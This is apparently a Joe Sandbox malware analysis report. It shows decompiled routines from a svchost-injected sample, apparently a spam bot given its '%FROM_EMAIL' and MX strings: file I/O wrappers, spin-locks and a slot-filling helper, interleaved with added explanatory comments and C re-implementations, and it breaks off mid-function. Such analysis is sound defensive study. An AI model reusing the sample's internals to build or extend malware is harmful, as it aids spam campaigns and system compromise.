                                                                                                                                  					return 1;
                                                                                                                                  				}
                                                                                                                                  				if(GetLastError() != 0x3e5) {
                                                                                                                                  					goto L5;
                                                                                                                                  				}
                                                                                                                                  				WaitForSingleObject(_t31, _a20);
                                                                                                                                  				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
                                                                                                                                  					goto L5;
                                                                                                                                  				}
                                                                                                                                  				goto L3;
                                                                                                                                  			}

                                                                                                                                  0x02513f1e
                                                                                                                                  0x02513f22
                                                                                                                                  0x02513f27
                                                                                                                                  0x02513f2b
                                                                                                                                  0x02513f2e
                                                                                                                                  0x02513f3e
                                                                                                                                  0x02513f4c
                                                                                                                                  0x02513f7c
                                                                                                                                  0x02513f7f
                                                                                                                                  0x02513f86
                                                                                                                                  0x00000000
                                                                                                                                  0x02513f86
                                                                                                                                  0x00000000
                                                                                                                                  0x02513f83
                                                                                                                                  0x02513f59
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02513f5f
                                                                                                                                  0x02513f7a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,0251A3C7,00000000,00000000,000007D0,00000001), ref: 02513F44
                                                                                                                                  • GetLastError.KERNEL32 ref: 02513F4E
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000004,?), ref: 02513F5F
                                                                                                                                  • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 02513F72
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3373104450-0
                                                                                                                                  • Opcode ID: 63ca96bb7d14d971b14b69973adbff35363cacfa7289306758a9c944479c3fb9
                                                                                                                                  • Instruction ID: 8900fbf2f225a41f65acba4cb6a59942b30ff7e495d75621cbea5b51b9b44f76
                                                                                                                                  • Opcode Fuzzy Hash: 63ca96bb7d14d971b14b69973adbff35363cacfa7289306758a9c944479c3fb9
                                                                                                                                  • Instruction Fuzzy Hash: DA01D772911109ABEF11DE90D944BEE7BBCFB04365F504495FA01E2080D7349A689BA9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02513F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
                                                                                                                                  				struct _OVERLAPPED _v24;
                                                                                                                                  				long _t30;
                                                                                                                                  				void* _t31;
                                                                                                                                  
                                                                                                                                  				_v24.Offset = _v24.Offset & 0x00000000;
                                                                                                                                  				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
                                                                                                                                  				_t30 = _a12;
                                                                                                                                  				_t31 = _a16;
                                                                                                                                  				_a16 = _a16 & 0x00000000;
                                                                                                                                  				_v24.hEvent = _t31;
                                                                                                                                  				if(ReadFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
                                                                                                                                  					L3:
                                                                                                                                  					if(_t30 != _a16) {
                                                                                                                                  						L5:
                                                                                                                                  						return 0;
                                                                                                                                  					}
                                                                                                                                  					return 1;
                                                                                                                                  				}
                                                                                                                                  				if(GetLastError() != 0x3e5) {
                                                                                                                                  					goto L5;
                                                                                                                                  				}
                                                                                                                                  				WaitForSingleObject(_t31, _a20);
                                                                                                                                  				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
                                                                                                                                  					goto L5;
                                                                                                                                  				}
                                                                                                                                  				goto L3;
                                                                                                                                  			}

                                                                                                                                  0x02513f92
                                                                                                                                  0x02513f96
                                                                                                                                  0x02513f9b
                                                                                                                                  0x02513f9f
                                                                                                                                  0x02513fa2
                                                                                                                                  0x02513fb2
                                                                                                                                  0x02513fc0
                                                                                                                                  0x02513ff0
                                                                                                                                  0x02513ff3
                                                                                                                                  0x02513ffa
                                                                                                                                  0x00000000
                                                                                                                                  0x02513ffa
                                                                                                                                  0x00000000
                                                                                                                                  0x02513ff7
                                                                                                                                  0x02513fcd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02513fd3
                                                                                                                                  0x02513fee
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,0251A3C7,00000000,00000000,000007D0,00000001), ref: 02513FB8
                                                                                                                                  • GetLastError.KERNEL32 ref: 02513FC2
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000004,?), ref: 02513FD3
                                                                                                                                  • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 02513FE6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 888215731-0
                                                                                                                                  • Opcode ID: bb0e6b2e717fef1caa3ca12ae85e353f12d78a7e3c8493741cb41d5ee58c3d37
                                                                                                                                  • Instruction ID: f24c1aa8f1953c4cb9ed24e4a9bfec386da7f97c518d22f808fd324f1ec1586a
                                                                                                                                  • Opcode Fuzzy Hash: bb0e6b2e717fef1caa3ca12ae85e353f12d78a7e3c8493741cb41d5ee58c3d37
                                                                                                                                  • Instruction Fuzzy Hash: 3701297391110AABEF11DF90D945BEE3BBCFB04355F404451F902E2080D738DA288BB9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                   			/* Timed spin-lock acquire on the LONG at _a4 + 0x5c. InterlockedExchange
                                                                                                                                   			   returns the previous flag value, so 0 means the lock was free and is now
                                                                                                                                   			   held by the caller. Otherwise it retries, yielding its time slice with
                                                                                                                                   			   Sleep(0), until 0x1388 (5000) ms have elapsed. Returns 0 on success and
                                                                                                                                   			   the elapsed milliseconds (>= 5000) on timeout; on timeout the flag is
                                                                                                                                   			   left as found (1 was written over 1), so the caller does NOT hold it. */
                                                                                                                                   			E0251A4C7(intOrPtr _a4) {
                                                                                                                                   				long _t3;
                                                                                                                                   				LONG* _t8;
                                                                                                                                   				long _t9;
                                                                                                                                   
                                                                                                                                   				_t9 = GetTickCount();          /* start tick, for the timeout */
                                                                                                                                   				_t8 = _a4 + 0x5c;              /* lock flag inside the object   */
                                                                                                                                   				while(1) {
                                                                                                                                   					_t3 = InterlockedExchange(_t8, 1);
                                                                                                                                   					if(_t3 == 0) {
                                                                                                                                   						break;                     /* was free: acquired          */
                                                                                                                                   					}
                                                                                                                                   					_t3 = GetTickCount() - _t9;
                                                                                                                                   					if(_t3 < 0x1388) {
                                                                                                                                   						Sleep(0);                  /* yield and retry             */
                                                                                                                                   						continue;
                                                                                                                                   					}
                                                                                                                                   					break;                         /* timed out after 5000 ms     */
                                                                                                                                   				}
                                                                                                                                   				return _t3;
                                                                                                                                   			}







                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251A4D1
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251A4E4
                                                                                                                                  • Sleep.KERNEL32(00000000,?,0251C2E9,0251C4E0,00000000,localcfg,?,0251C4E0,02523588,02518810), ref: 0251A4F1
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 0251A4FA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: b89581744301b254275237a0ca0daba403e5367349e033586f7154dc7de1e100
                                                                                                                                  • Instruction ID: 67802e1be0ae70881c2584d7a5b1a27f5a4c4e3d7578acccd92ff61e66ddf80d
                                                                                                                                  • Opcode Fuzzy Hash: b89581744301b254275237a0ca0daba403e5367349e033586f7154dc7de1e100
                                                                                                                                  • Instruction Fuzzy Hash: 6EE0263324321457EA106BA5AC84F7A3788BB4A761F430421FB04D31C1C65AA859C1BE
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                   			/* Same timed spin-lock acquire as E0251A4C7, on the flag at this + 4
                                                                                                                                   			   (__ecx is the object pointer, thiscall). Longer budget: gives up after
                                                                                                                                   			   0x2710 (10000) ms and backs off 0xa (10) ms between attempts instead of
                                                                                                                                   			   yielding. Returns 0 on success, elapsed ms (>= 10000) on timeout. */
                                                                                                                                   			E02514E92(void* __ecx) {
                                                                                                                                   				long _t2;
                                                                                                                                   				void* _t7;
                                                                                                                                   				LONG* _t8;
                                                                                                                                   				long _t9;
                                                                                                                                   
                                                                                                                                   				_t7 = __ecx;
                                                                                                                                   				_t9 = GetTickCount();
                                                                                                                                   				_t8 = _t7 + 4;                 /* lock flag at offset 4 */
                                                                                                                                   				while(1) {
                                                                                                                                   					_t2 = InterlockedExchange(_t8, 1);
                                                                                                                                   					if(_t2 == 0) {
                                                                                                                                   						break;                     /* acquired */
                                                                                                                                   					}
                                                                                                                                   					_t2 = GetTickCount() - _t9;
                                                                                                                                   					if(_t2 < 0x2710) {
                                                                                                                                   						Sleep(0xa);                /* 10 ms back-off */
                                                                                                                                   						continue;
                                                                                                                                   					}
                                                                                                                                   					break;                         /* timed out after 10000 ms */
                                                                                                                                   				}
                                                                                                                                   				return _t2;
                                                                                                                                   			}








                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02514E9E
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02514EAD
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000001), ref: 02514EBA
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02514EC3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 4a6cdea17a245af7f9e9b4cbc324c518d0e7de0a11d48639b8286244444d7035
                                                                                                                                  • Instruction ID: 8dde27b513d2c52ec34869659f3fdfde7032c749e874d35ee9940b55a54ff93b
                                                                                                                                  • Opcode Fuzzy Hash: 4a6cdea17a245af7f9e9b4cbc324c518d0e7de0a11d48639b8286244444d7035
                                                                                                                                  • Instruction Fuzzy Hash: B3E0263264221417F6202AB9AC80F676649AB57360F020E31E708C21C0C656941A41BA
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                   			/* Timed spin-lock acquire on the flag at this + 0xc (thiscall, object
                                                                                                                                   			   in __ecx). 0x1388 (5000) ms budget, Sleep(0) yield between attempts.
                                                                                                                                   			   Returns 0 on success, elapsed ms (>= 5000) on timeout. */
                                                                                                                                   			E02514BD1(void* __ecx) {
                                                                                                                                   				long _t2;
                                                                                                                                   				void* _t7;
                                                                                                                                   				LONG* _t8;
                                                                                                                                   				long _t9;
                                                                                                                                   
                                                                                                                                   				_t7 = __ecx;
                                                                                                                                   				_t9 = GetTickCount();
                                                                                                                                   				_t8 = _t7 + 0xc;               /* lock flag at offset 0xc */
                                                                                                                                   				while(1) {
                                                                                                                                   					_t2 = InterlockedExchange(_t8, 1);
                                                                                                                                   					if(_t2 == 0) {
                                                                                                                                   						break;                     /* acquired */
                                                                                                                                   					}
                                                                                                                                   					_t2 = GetTickCount() - _t9;
                                                                                                                                   					if(_t2 < 0x1388) {
                                                                                                                                   						Sleep(0);                  /* yield and retry */
                                                                                                                                   						continue;
                                                                                                                                   					}
                                                                                                                                   					break;                         /* timed out after 5000 ms */
                                                                                                                                   				}
                                                                                                                                   				return _t2;
                                                                                                                                   			}








                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02514BDD
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02514BEC
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,02A181BC,025150F2), ref: 02514BF9
                                                                                                                                  • InterlockedExchange.KERNEL32(02A181B0,00000001), ref: 02514C02
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: c95d5c37245f52885686f14bd93c048b5c42b84d6906a85d9ec86b7770de28ae
                                                                                                                                  • Instruction ID: eb2505f076ebb7db0b3f095d7853b2ffc3caf7f1e0e41c3a49fa7332828d356c
                                                                                                                                  • Opcode Fuzzy Hash: c95d5c37245f52885686f14bd93c048b5c42b84d6906a85d9ec86b7770de28ae
                                                                                                                                  • Instruction Fuzzy Hash: 57E0CD3768221457FB202AB55C80F76775CFB56761F470872F708D31C0C556945945BD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                   			/* Generic form of the same timed spin-lock acquire: the LONG flag is
                                                                                                                                   			   passed directly in _a4 rather than found at a fixed object offset.
                                                                                                                                   			   0x1388 (5000) ms budget, Sleep(0) yield between attempts. Returns 0 on
                                                                                                                                   			   success, elapsed ms (>= 5000) on timeout. */
                                                                                                                                   			E025130FA(LONG* _a4) {
                                                                                                                                   				long _t3;
                                                                                                                                   				long _t5;
                                                                                                                                   
                                                                                                                                   				_t5 = GetTickCount();
                                                                                                                                   				while(1) {
                                                                                                                                   					_t3 = InterlockedExchange(_a4, 1);
                                                                                                                                   					if(_t3 == 0) {
                                                                                                                                   						break;                     /* acquired */
                                                                                                                                   					}
                                                                                                                                   					_t3 = GetTickCount() - _t5;
                                                                                                                                   					if(_t3 < 0x1388) {
                                                                                                                                   						Sleep(0);                  /* yield and retry */
                                                                                                                                   						continue;
                                                                                                                                   					}
                                                                                                                                   					break;                         /* timed out after 5000 ms */
                                                                                                                                   				}
                                                                                                                                   				return _t3;
                                                                                                                                   			}
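The four routines above (E0251A4C7, E02514E92, E02514BD1, E025130FA) are one timed spin-lock acquire that differs only in where the flag lives, the budget (5000 or 10000 ms) and the back-off (Sleep(0) or Sleep(10)). The block below is an added, portable re-implementation of that pattern for study; it is not code from this report or from the sample. It substitutes C11 atomics and POSIX clock_gettime, sched_yield and nanosleep for InterlockedExchange, GetTickCount and Sleep, and the names timed_spin_acquire, spin_release, tick_fn, backoff_fn and the demo_* self-checks are assumptions. The fake clock that advances 7 ms per read is constructed so the timeout path can be exercised without actually waiting.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdatomic.h>
#include <stdint.h>
#include <stdio.h>
#include <sched.h>
#include <time.h>

/* Pluggable tick source and back-off hook (assumed interface, not in the
 * sample): the loop runs against a fake clock in the self-checks below and
 * against the real clock in main(). */
typedef uint32_t (*tick_fn)(void);
typedef void (*backoff_fn)(void);

/* Real clock: millisecond counter that wraps at 2^32, like GetTickCount(). */
uint32_t tick_ms(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint32_t)((uint64_t)ts.tv_sec * 1000u + (uint64_t)ts.tv_nsec / 1000000u);
}
void yield_slice(void) { sched_yield(); }      /* stands in for Sleep(0)   */
void sleep_10ms(void) {                        /* stands in for Sleep(0xa) */
    struct timespec ts = { 0, 10L * 1000000L };
    nanosleep(&ts, NULL);
}

/* Elapsed ticks with the same wrapping unsigned subtraction as the sample,
 * so a counter wrap between start and now still yields the right delta. */
uint32_t elapsed_ms(uint32_t start, uint32_t now) { return now - start; }

/* Same contract as the decompiled routines:
 *   returns 0           -> lock taken (flag went 0 -> 1 under us)
 *   returns >= timeout  -> gave up; value is the elapsed milliseconds
 * On timeout the flag is left as found (1 written over 1), so the owner's
 * release is unaffected; a non-zero result means the caller does NOT hold
 * the lock and must not touch the protected state. */
uint32_t timed_spin_acquire(atomic_long *lock, uint32_t timeout_ms,
                            tick_fn now, backoff_fn backoff) {
    uint32_t start = now();
    for (;;) {
        long prev = atomic_exchange(lock, 1);   /* InterlockedExchange(lock, 1) */
        if (prev == 0)
            return 0;
        uint32_t waited = elapsed_ms(start, now());
        if (waited >= timeout_ms)
            return waited;
        backoff();
    }
}

void spin_release(atomic_long *lock) { atomic_store(lock, 0); }

/* ---- self-checks on a constructed fake clock (advances 7 ms per read) ---- */
static uint32_t fake_clock;
static uint32_t fake_tick(void) { fake_clock += 7; return fake_clock; }
static void fake_backoff(void) { }

/* Free lock: acquire returns 0 and the flag is now 1. Result is 0 only if both hold. */
uint32_t demo_uncontended(void) {
    atomic_long lock = 0;
    fake_clock = 0;
    uint32_t r = timed_spin_acquire(&lock, 5000, fake_tick, fake_backoff);
    return r | (uint32_t)(atomic_load(&lock) != 1);
}

/* Held lock: start tick is 7, each retry adds 7 ms, so the loop gives up at
 * the first multiple of 7 that is >= 5000, i.e. it returns 5005. */
uint32_t demo_contended_timeout(void) {
    atomic_long lock = 1;
    fake_clock = 0;
    return timed_spin_acquire(&lock, 5000, fake_tick, fake_backoff);
}

/* Owner releases, then a fresh acquire succeeds (returns 0). */
uint32_t demo_release_then_reacquire(void) {
    atomic_long lock = 1;
    fake_clock = 0;
    spin_release(&lock);
    return timed_spin_acquire(&lock, 5000, fake_tick, fake_backoff);
}

int main(void) {
    atomic_long lock = 0;
    uint32_t r = timed_spin_acquire(&lock, 5000, tick_ms, yield_slice);
    printf("first acquire: %u (0 = held)\n", r);
    r = timed_spin_acquire(&lock, 50, tick_ms, sleep_10ms);
    printf("second acquire while held: gave up after %u ms\n", r);
    spin_release(&lock);
    return 0;
}
```

The practical check when reading callers of these routines in the dump: the result is only meaningful if the caller tests it for zero. A caller that ignores the return value proceeds into the critical section after 5 or 10 seconds of contention whether or not it won the flag, which is a race with the real holder rather than a lock.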






                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02513103
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251310F
                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 0251311C
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02513128
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 5cba0e2fac9cbe12f5d292aaeaaebcebeb83cc2bbb18f1aa1b09aba83ba0ddc1
                                                                                                                                  • Instruction ID: 35a2165f31465510cd8aea6061c09af08579fef2085e08deb412025325c82ed9
                                                                                                                                  • Opcode Fuzzy Hash: 5cba0e2fac9cbe12f5d292aaeaaebcebeb83cc2bbb18f1aa1b09aba83ba0ddc1
                                                                                                                                  • Instruction Fuzzy Hash: DAE0C231682215BBFB102F75AD84BA96A5AEF95761F1208B1F205D20D0C650481C9979
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
			/* Walks _a8 pointers starting at _a4.  Each pointer addresses a record whose
			   fields the decompiler shows at negative offsets (-0x24 .. -0x8).  The lock
			   word at 0x2522c00 is acquired through E025130FA (its API chain is
			   GetTickCount / InterlockedExchange(?,1) / Sleep(0), i.e. a spin-wait) and
			   released at L13 by storing 0 to it.  _t10 and _t34 are used by the listing
			   without a declaration; they are declared here so the code reads consistently. */
			E025138F0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t29;
				intOrPtr _t34;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t50;

				if(_a8 <= 0) {
					L14:
					return _t29; /* on this path _t29 was never assigned (decompiler artefact) */
				}
				_t29 = E025130FA(0x2522c00); /* acquire the lock word at 0x2522c00 */
				_v8 = 0;
				if(_a8 <= 0) {
					L13:
					 *0x2522c00 =  *0x2522c00 & 0x00000000; /* release the lock (store 0) */
					goto L14;
				} else {
					do {
						_t50 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + _v8 * 4)))); /* record for index _v8 */
						_t45 =  *((intOrPtr*)(_t50 - 0x24));                      /* object referenced at rec-0x24 */
						if( *((intOrPtr*)(_t50 - 0x14)) != GetCurrentThreadId()) {
							/* rec-0x14 holds the thread id that last touched the record; on a
							   thread change the counter at rec-0x1c is decremented and floored at 0 */
							_t10 = _t50 - 0x1c;
							 *_t10 =  *(_t50 - 0x1c) - 1;
							if( *_t10 < 0) {
								 *(_t50 - 0x1c) =  *(_t50 - 0x1c) & 0x00000000;
							}
							 *((intOrPtr*)(_t50 - 0x14)) = GetCurrentThreadId();
						}
						 *((intOrPtr*)(_t50 - 0xc)) =  *((intOrPtr*)(_t50 - 0xc)) + 1; /* per-record attempt counter */
						if( *((intOrPtr*)(_t50 - 0xc)) >=  *((intOrPtr*)(_t50 - 8))) {    /* limit stored at rec-0x8 reached */
							_t43 = 2;
							 *((intOrPtr*)(_t50 - 0x20)) = _t43;                              /* record state := 2 */
							 *((intOrPtr*)(_t45 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10)) + 1;
							_t34 =  *((intOrPtr*)(_t45 + 0x10));
							if( *((intOrPtr*)(_t45 + 0x10)) >=  *((intOrPtr*)(_t45 + 0x14))) { /* referenced object exhausted too */
								 *((intOrPtr*)(_t45 + 8)) = _t43;                              /* its state := 2 as well */
								if( *0x2522bfc == 0) {
									E02516509(_t34); /* executed once: guarded by the global flag at 0x2522bfc */
									 *0x2522bfc = 1;
								}
							}
						}
						_v8 = _v8 + 1;
						_t29 = _v8;
					} while (_t29 < _a8);
					goto L13;
				}
			}









                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 025130FA: GetTickCount.KERNEL32 ref: 02513103
                                                                                                                                    • Part of subcall function 025130FA: InterlockedExchange.KERNEL32(?,00000001), ref: 02513128
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02513929
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02513939
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread$CountExchangeInterlockedTick
                                                                                                                                  • String ID: %FROM_EMAIL
                                                                                                                                  • API String ID: 3716169038-2903620461
                                                                                                                                  • Opcode ID: ae768f14b95e47104f603149d96e9f7dfb816e5af2c38a959e95a95f97d1e9ff
                                                                                                                                  • Instruction ID: 952c5024581ba3e67626992b68eca2b601ac4d59484ed777a7f1b4650e83475a
                                                                                                                                  • Opcode Fuzzy Hash: ae768f14b95e47104f603149d96e9f7dfb816e5af2c38a959e95a95f97d1e9ff
                                                                                                                                  • Instruction Fuzzy Hash: 49116A75900209FFE720DF29D480A68F7F5FB45726F11899EE84497280C770AA88DFA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
			/* Scans _a8 pointers at _a4.  A slot is free when the byte at +0x10 equals 1
			   and the string at +0x12 is empty.  Such a slot receives the flag _a20 at
			   +0x11, the string _a16 at +0x12 (lstrcpynA with 0x3e: at most 0x3d
			   characters plus NUL), a forced NUL at +0x4f (the last byte of that field)
			   and the new state _a12 at +0x10.  One of two global counters is then
			   incremented: 0x252363c when the new state is 2, 0x2523640 otherwise. */
			E0251AB81(intOrPtr _a4, intOrPtr _a8, char _a12, CHAR* _a16, char _a20) {
				void* _t15;
				long _t17;
				signed int _t29;
				long* _t31;

				_t29 = 0;
				if(_a8 > 0) {
					do {
						_t31 = _a4 + _t29 * 4;
						_t17 =  *_t31;
						if( *((char*)(_t17 + 0x10)) == 1 &&  *((char*)(_t17 + 0x12)) == 0) {
							 *((char*)(_t17 + 0x11)) = _a20;
							lstrcpynA( *_t31 + 0x12, _a16, 0x3e);
							 *((char*)( *_t31 + 0x4f)) = 0;
							 *((char*)( *_t31 + 0x10)) = _a12;
							if( *((char*)( *_t31 + 0x10)) != 2) {
								_t17 = InterlockedIncrement(0x2523640);
							} else {
								_t17 = InterlockedIncrement(0x252363c);
							}
						}
						_t29 = _t29 + 1;
					} while (_t29 < _a8);
					return _t17; /* whatever _t17 last held: the last slot pointer or the last InterlockedIncrement result */
				}
				return _t15;     /* _t15 is never assigned: EAX on entry (decompiler artefact) */
			}








                                                                                                                                  APIs
                                                                                                                                  • lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0251BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0251ABB9
                                                                                                                                  • InterlockedIncrement.KERNEL32(02523640), ref: 0251ABE1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IncrementInterlockedlstrcpyn
                                                                                                                                  • String ID: %FROM_EMAIL
                                                                                                                                  • API String ID: 224340156-2903620461
                                                                                                                                  • Opcode ID: 856475977378f3a731c25544fea71b7c8ff2dd80692dbd03529f1c2d5c9ec17f
                                                                                                                                  • Instruction ID: 4364df257eb5da52167ae29ecf5cb7e3db1635669fd51f5867f96c9727c99d94
                                                                                                                                  • Opcode Fuzzy Hash: 856475977378f3a731c25544fea71b7c8ff2dd80692dbd03529f1c2d5c9ec17f
                                                                                                                                  • Instruction Fuzzy Hash: 32019E315093D4AFFB22CE18D881F967FAABF56314F154884E58047283C374E588CBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
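The field accesses in E0251AB81 (+0x10, +0x11, +0x12 and the forced NUL at +0x4f) describe one fixed-size record. The block below is an added example written for this page; it is not Joe Sandbox output and not code from the sample. It rebuilds that record as a C struct, checks the recovered offsets with static assertions, and re-expresses the routine over the struct with a portable stand-in for lstrcpynA, so the 61-character truncation and the two counters can be exercised offline. The field names (state, kind_flag, target), the counter names and the sample slots are assumptions; only the offsets, the 0x3e length and the control flow come from the listing.

```c
/* Added example for this page (not Joe Sandbox output and not the sample's own
 * code).  Rebuilds the record layout that E0251AB81's field accesses imply and
 * mirrors the routine's logic over it.  Field and counter names are assumed;
 * the offsets, the 0x3e copy length and the control flow come from the listing. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TARGET_LEN 0x3e   /* the length passed to lstrcpynA in the listing */

typedef struct slot {
    uint8_t unknown[0x10];      /* +0x00..+0x0f: not touched by this routine */
    char    state;              /* +0x10: 1 = free; set to the new state when claimed */
    char    kind_flag;          /* +0x11: receives the _a20 argument */
    char    target[TARGET_LEN]; /* +0x12..+0x4f: lstrcpynA destination */
} slot_t;

/* The offsets above must match the decompiled accesses exactly. */
_Static_assert(offsetof(slot_t, state) == 0x10, "state at +0x10");
_Static_assert(offsetof(slot_t, kind_flag) == 0x11, "flag at +0x11");
_Static_assert(offsetof(slot_t, target) == 0x12, "target at +0x12");
_Static_assert(offsetof(slot_t, target) + TARGET_LEN - 1 == 0x4f,
               "the explicit NUL at +0x4f is the last byte of target");

/* Stand-ins for the two InterlockedIncrement targets (0x252363c / 0x2523640).
 * Assumed names; in the dump they are plain globals. */
static long g_count_state2 = 0;   /* 0x252363c: new state == 2 */
static long g_count_other  = 0;   /* 0x2523640: new state != 2 */

/* lstrcpynA semantics: copy at most n-1 characters and always NUL-terminate,
 * so with n == 0x3e at most 61 characters survive.  Portable stand-in. */
static void lstrcpyn_like(char *dst, const char *src, size_t n)
{
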